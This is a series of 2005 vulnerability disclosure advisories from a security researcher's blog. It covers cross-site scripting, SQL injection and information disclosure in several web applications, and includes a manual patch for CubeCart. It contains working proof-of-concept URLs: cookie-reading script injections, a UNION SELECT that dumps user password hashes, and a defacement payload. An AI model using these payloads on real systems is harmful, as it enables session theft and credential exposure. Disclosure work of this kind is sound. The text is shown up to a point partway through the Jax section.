GMailSite variable Cross-Site Scripting and script injection

Thursday, December 29, 2005
#######################################################
GMailSite variable Cross-Site Scripting and script injection
Vendor Url:http://www.gmailsite.com/
vendor specific entry:http://foros.ojobuscador.com/tema1936.html
Advisore:http://lostmon.blogspot.com/2005/12/
gmailsite-variable-cross-site.html
vendor notify:yes Exploit available:yes
OSVDB ID:22083,22095
Secunia:SA18155
BID:16081
########################################################

GMailSite is script that allows that you use your
account of mail of GMail to create a page in which
all the attached archives of your messages will be
published that esten kept under some label in your
account from mail.

GMailSite contains a flaw that allows a remote
Cross-Site Scripting attack.This flaw exists because
the application does not validate 'lng' variable upon
submission to index.php script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

Wen we "inject" the html or javascript code in the 'lng'
variable , this code is write in the coockie and it is
execute every time wen we click on a link in the GMailSite
for stop this code only need to click in other language.
This Flaw Is a posible script insercion,and a posible
local file inclusion.

#################
versions afected
#################

GMailSite

GmailSite 1.0.4 -
GmailSite 1.0.3 -
GmailSite 1.0.2 -
GmailSite 1.0.1 -
GmailSite 1.0 -

GFHost

GFHost 0.4.2
GFHost 0.4.1
GFHost 0.4
GFHost 0.3
GFHost 0.2
GFHost 0.1.1

#################
Solution
#################

No solution at this time !!!

#############
Timeline
#############

Discovered: 13-11-2005
Vendor notify: 28-12-2005
Vendor response:28-12-2005
Disclosure:29-12-2005

##################
Example
##################

http://[VICTIM]/?lng=es"><script>alert(document.cookie)</script>
http://[VICTIM]/index.php?lng=es"><script>alert(document.cookie)</script>

##################### €nd ###############

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Nuke ET 'search' module 'query' variable SQL injection

Monday, November 21, 2005
###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2005/11/
nuke-et-search-module-query-variable.html
OSVDB ID:21002
Secunia:SA17638
BID:15519
################################################

Nuke ET have a flaw which can be exploited by malicious people to
conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

Nuke ET 3.2
posible prior versions are afected.

##################
solution:
###################

the vendor has release a fix

http://www.truzone.org/modules.php?name=
DescNuke&d_op=getit&lid=1557


aply the fix as fast posible

####################
Timeline
####################

discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21.11.2005
disclosure:21-11-2005

###################
example:
###################

go to
http://[Victim]/modules.php?name=Search

and write in the search box this proof

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

all users hashes are available to view..

#################### €nd ########################

Thnx to estrella to be my ligth
Thnx to Truzone
Thnx to RiXi
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Revize(r) CMS SQL information disclosure and XSS

Wednesday, November 16, 2005
#######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
OSVDB ID: 20918,20919,20920,20921,20922
Securitytracker:1015231
Secunia:SA17623
BID:15481,15482,15484
#######################################################

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker execute or manipulate SQL
queries in the backend database.

a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

unknow version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE

¿Admin Bypass ?

http://[Victim]/revize/debug/

wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we don´t need a login.


http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp


################### €nd ############################

thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Spymac Web OS v4 blogs and notes multiple variable XSS

Friday, November 04, 2005
#####################################################
Spymac Web OS v4 blogs and notes multiple variable XSS
Vendor url: http://www.spymac.com &
http://arnieshwartz.spymac.com/the_spymac_web_os.htm
Advisore: http://lostmon.blogspot.com/2005/11/
spymac-web-os-v4-blogs-and-notes.html
Vendor notify :yes exploit available: yes
OSVDB ID:20902,20903,20904,20905,20906,20907

#####################################################


Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.


################
VERSIONS
################

Spymac Web Os 4.0

#########
Solution
#########

No solution at this time

##########
timeline
##########

Discovered : 28 10 2005
Vendor notify: 02 11 2005
Vendor response:
Disclosure : 04-11-2005


###################
EXAMPLES#
###################

For exploit some vulns, you need to login.

###########
IN BLOGS
###########

http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]

http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]
&system=blogentries&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=
blogentries[XSS-CODE]&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=
blogentries&title=Blogs%20now%20online[XSS-CODE]

http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]

http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff
&caldate=1128146400[XSS-CODE]

###########
IN NOTES
###########

http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]
http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]
http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100[XSS-CODE]
http://[victim]/notes/index.php?isread=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]
http://[Victim]/notes/index.php?action=shownote¬eid=243633[XSS-CODE]
http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633
http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]

######################## €nd #########################

thnx to estrella to be my ligth

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Flyspray "The bug killer" multiple variable Cross-Site Scripting

Wednesday, October 26, 2005
####################################################
Flyspray "The bug killer" multiple variable Cross-Site Scripting
vendor url:http://flyspray.rocks.cc/
Vendor specific bug report: http://flyspray.rocks.cc/bts/task/703
Advisore:http://lostmon.blogspot.com/2005/10/
flyspray-bug-killer-multiple-variable.html
vendor notify:yes exploit available:yes
OSVDB ID:20326
Secunia:17316
BID:15209
#####################################################

Flyspray is an uncomplicated, web-based bug tracking system for
assisting with software development.

Flyspray "The bug killer" contains a flaw that allows a remote
cross site scripting attack.This flaw exists because the application
does not validate multiple variables upon submission to index.php
script.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

##################
versions
##################

Flyspray 0.9.7
Flyspray 0.9.8
Flyspray 0.9.8 (devel)


##################
solution
##################

Update to version Flyspray 0.9.8 update1

###################
TimeLine
###################

Discovered:20-10-2005
Vendor notify:24-10-2005
Vendor response:25-10-2005
Disclosure:26-10-2005


####################
Examples
####################

http://[victim]/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=
&dev=&cat=&status=&perpage=20

variables PHPSESSID, task,string,type,serv,due,dev are
afected by XSS flaws.

http://[victim]/index.php?tasks=all%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E&project=0

variable task afected.

http://[victim]/index.php?order=sev&project=1&tasks=&type=
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&
sort=desc&order2=&sort2=desc

task,type,due,string,sort2, these variables are
afected by XSS flaws.

########################## €nd #############################

thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Comersus BackOffice Plus Cross site scripting

Sunday, October 16, 2005
#####################################################
Comersus BackOffice Plus Cross site scripting
Vendor url:http://www.comersus.com/demo.html
Advisore:http://lostmon.blogspot.com/2005/10/
comersus-backoffice-plus-cross-site.html
vendor notify:yes exploit available:yes
OSVDB ID:20032
Secunia:17219
Securitytracker:1015064
BID:15118
######################################################


Comersus BackOffice Plus contains a flaw that allows a remote
cross site scripting attack.This flaw exists because the
application does not validate some variables upon submission to
comersus_backoffice_searchItemForm.asp script.This could allow
a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.

#############
version:
##############

Comersus Backoffice plus

###########
solution:
###########

No solution was available at this time.


####################
Timeline
####################

discovered: 24-09-2005
vendor notify:28-09-2005
vendor response:28-09-2005
vendor especific bug report: 7-10-2005
Vendor response:-----------
disclosure: 16-10-2005

##################
Proof of comcept:
##################

For exploit this flaw you must be logged...

http://[victim]/backOfficePlus/comersus_backoffice_searchItemForm.asp?
forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&
forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE]

all variables are vulnerables to Cross site
scripting

##################### €nd #####################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

CubeCart™ 3.0.3 multiple variable Cross site scripting

Wednesday, September 28, 2005
################################################
CubeCart™ 3.0.3 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=363
Advisore:http://lostmon.blogspot.com/2005/09/
cubecart-303-multiple-variable-cross.html
vendor confirmed: yes exploit avalable: yes
Fix available: yes
OSVDB ID:19860,>19861
Securitytracker:1014984
BID:14962
################################################

CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to cart.php and index.php scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.

###############
VERSIONS
###############

CubeCart™ 3.0.3 vulnerable
CubeCart™ 3.0.4 not vulnerable

#################
Timeline
#################

Discovered: 24 sep 2005
vendor notify: 24 sep 2005
Vendor response:26 sep 2005
Solution: 28 sep 2005
Disclosure:24 sep 2005
Public disclosure: 28 sep 2005

###############
Examples:
###############

http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]

http://[victim]/cc3/cart.php?act=reg&redir=[XSS-CODE]


http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go

http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x[XSS-CODE]

#############
SOLUTION
#############

The vendor has release a fix.
and the follow URI are available for download
the latest version of CubeCart.

http://www.cubecart.com/site/forums/index.php?download=222

Thnx to all CubeCart Tem , they make a very Good work !!!

################################################
MANUAL FIX
################################################
///////////////////////////////////////
// 1. Open: /includes/content/reg.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 123:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$redir = base64_decode($_GET['redir']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$redir = base64_decode(treatGet($_GET['redir']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 170:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$reg->assign("VAL_ACTION","cart.php?act=reg&
redir=".$_GET['redir']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$reg->assign("VAL_ACTION","cart.php?act=reg&
redir=".treatGet($_GET['redir']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 2. Open: /includes/content/login.inc.php
////////


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 55:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

header("Location: ".str_replace("&","&",
base64_decode($_GET['redir'])));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

header("Location: ".str_replace("&","&",
base64_decode(treatGet($_GET['redir']))));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 74:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$login->assign("VAL_SELF",$_GET['redir']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$login->assign("VAL_SELF",treatGet($_GET['redir']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 3. Open: /includes/boxes/searchForm.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 40:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$box_content->assign("SEARCHSTR",$_GET['searchStr']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$box_content->assign("SEARCHSTR",treatGet($_GET['searchStr']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 4. Open: /includes/content/viewCat.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 108:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$searchwords = split ( "[ ,]", $_GET['searchStr']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$searchwords = split ( "[ ,]", treatGet($_GET['searchStr']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 308:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".$_GET['searchStr']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".treatGet($_GET['searchStr']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 5. Open: /includes/functions.inc.php
////////


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
At around line 25 find:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

| functions.inc.php
| ========================================
| Core Frontend Functions
+----------------------------------------------
*/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Directly under this add:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
At around line 384 find:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

function currentPage(){

$currentPage = $_SERVER['PHP_SELF'];

if (isset($_SERVER['QUERY_STRING'])) {

$currentPage .= "?" . htmlentities($_SERVER['QUERY_STRING']);

}

return $currentPage;

}


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace this with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

function currentPage(){

$currentPage = $_SERVER['PHP_SELF'];

if (isset($_SERVER['QUERY_STRING'])) {

$currentPage .= "?" . htmlentities(treatGet($_SERVER['QUERY_STRING']));

}

return $currentPage;

}

///////////////////////////////////////
// 6. Open: /includes/ini.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 108:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$ini['ver'] = '3.0.3';

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$ini['ver'] = '3.0.4';

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// end of manual fix :O)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

##################### €nd ########################

Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Multiple variable XSS in Spymac Web Os v4.0

Sunday, September 18, 2005
UPDATE 20 sep 2005 :
VERSION AFECTED: Spymac v4

#########################################################
Multiple variable XSS in Spymac Web Os v4.0
vendor url:http://www.spymac.com/
Advisory:http://lostmon.blogspot.com/2005/09/
multiple-variable-xss-in-spymac-web-os.html
Vendor notified : yes exploit avaible : yes
OSVDB ID:19613
Securitytracker:1014928
#########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate some
variables upon submission to some scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between the
browser and the server,leading to a loss of integrity.

############
version afected
############

Spymac web os v4
Spymac Web Os 3.0 beta 190

#########
Solution
#########

No solution was available at this time.

##########
timeline
##########

Discovered : 17 sep 2005
Vendor notify: 17 sep 2005
Vendor response:
Disclosure :17 sep 2005
Public disclosure:17 sep 2005


############
Examples
############

http://[victim]/forums/showthread.php?threadid=195681[XSS-CODE]

http://[victim]/forums/showthread.php?threadid=195805&postid=3579278[XSS-CODE]#post_3579278

http://[victim]/forums/showthread.php?threadid=195605&curr=0[XSS-CODE]

########################### €nd ############################

Thnx to estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Spymac Web os 4.0 variable XSS

Sunday, September 11, 2005
#######################################################
Spymac Web os 4.0 variable XSS
vendor url:http://www.spymac.com/
Advisory:http://lostmon.blogspot.com/2005/09/
spymac-web-os-40-variable-xss.html
Vendor notified : yes exploit avaible : yes
OSVDB ID: 19438
Securitytracker:1014883
########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
'category' variable upon submission to 'index.php script.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.

############
version afected
############

Spymac Web Os 4.0

#########
Solution
#########

No solution at this time

##########
timeline
##########

Discovered : 10 sep 2005
Vendor notify: 10 sep 2005
Vendor response: 10 sep 2005
Disclosure : 10 sep 2005
Public disclosure: 11 sep 2005

############
Examples
############

http://[victim]/index.php?category=1%22%3E%3Cbody%3E%3Ch1%3ESe%20busca
%20H4x0r%3C/h1%3E%3Cp%3E%20es%20peligroso%20y%20va%20armado%3Cbr%3E%20
Lleva%20un%20portatil%20y%20un%20palm%20en%20las%20manos%3Cbr%3E%20si%
20le%20ven%20;%20no%20le%20proporcionen%20conexion%20a%20internet.%3C/p
%3E%3Cp%3E%3C/p%3E3Cimg20src=http://www.ttvn.com.vn/Uploaded/administrator/
hacker.jpg%3E%3Ch1%3EBy%20Lostmon%3C/h1%3E%3C/body%3E

############################# €nd ##########################

THnx To estrella to be my ligth...
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

DVBBS Multiple variable Cross site scripting

Monday, August 08, 2005
#############################################
DVBBS Multiple variable Cross site scripting
vendor url:http://down.dvbbs.net/
SoftView/SoftView_2455.html
Advisory:http://lostmon.blogspot.com/2005/08/
dvbbs-multiple-variable-cross-site.html
vendor notify:yes exploit available:yes
OSVDB ID:18512,18679,18680
Securitytracker: 1014632
BID:14498
Secunia: SA16131
#############################################

DVBBS contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity


############
solution
############

no solution available at this time !


############
versions
############

Dvbbs 7.1 Sp2
Dvbbs 7.1

#############
timeline
#############

discovered:21-jul-2005
disclosure:21-jul-2005
public disclosure:08-ago-2005

####################
proof of concept
####################


http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]

http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]

http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=

######################## €nd ##########################

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Jax PHP Scripts multiple vulnerabilities

Friday, August 05, 2005
############################################
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
OSVDB ID:18568,18569,18570,18571,18572,18573,18574,18575,18576,
18577,18578,18579,18580,18581,18582,18583,18584,18585,18586,
Secunia: SA16332,SA16333,SA16337,SA16338
BID: 14481
#############################################


###########
sumary:
###########

0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline

###############
0- Description
###############

Jax scripts is a collection of usefull php scripts to added or include in a web-site.

Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook

Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook

Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters
(Mailing List Manager)

Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)

Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)

Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates
(Template Editor)



###################
1-Products affected
###################

Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.

##################
2- Jax Guestbook
##################

Cross-Site Scripting and information disclosure:

http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]


http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]


http://[victim]/guestbook/guestbook
// clients ip who have post a firm in guestbook

http://[victim]/guestbook/guestbook_ips2block
//list of ips banned

http://[victim]/guestbook/ips2block
//list of ips banned

http://[victim]/guestbook/formmailer/logfile.csv
// ips ,from users send via formmail.php script.

################
versions
###############

Jax Guestbook v3.1
Jax Guestbook v3.31

###################
3- Jax Petitionbook
###################

Cross-Site Scripting and information disclosure:

http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]

http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0


http://[victim]/petitionbook/formmailer.log
// all ip , and message what all users sent via formmail


http://[victim]/petitionbook/ips2block
//all ips banned

http://[victim]/petitionbook/petitionbook
//all ips of people have signed the petition



#################
4- Jax Newsletter
#################

Cross-Site Scripting and information disclosure:

http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1

http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1

http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]

http://[victim]/newsletter/logs/jnl_records
// information disclosure form users ,direct request
to this file reveals:

"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.

############
versions
############

Jax Newsletter v2.14
Jax Newsletter v2.10

#################
5- Jax LinkLists
#################

Cross-Site Scripting and information disclosure:

http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]

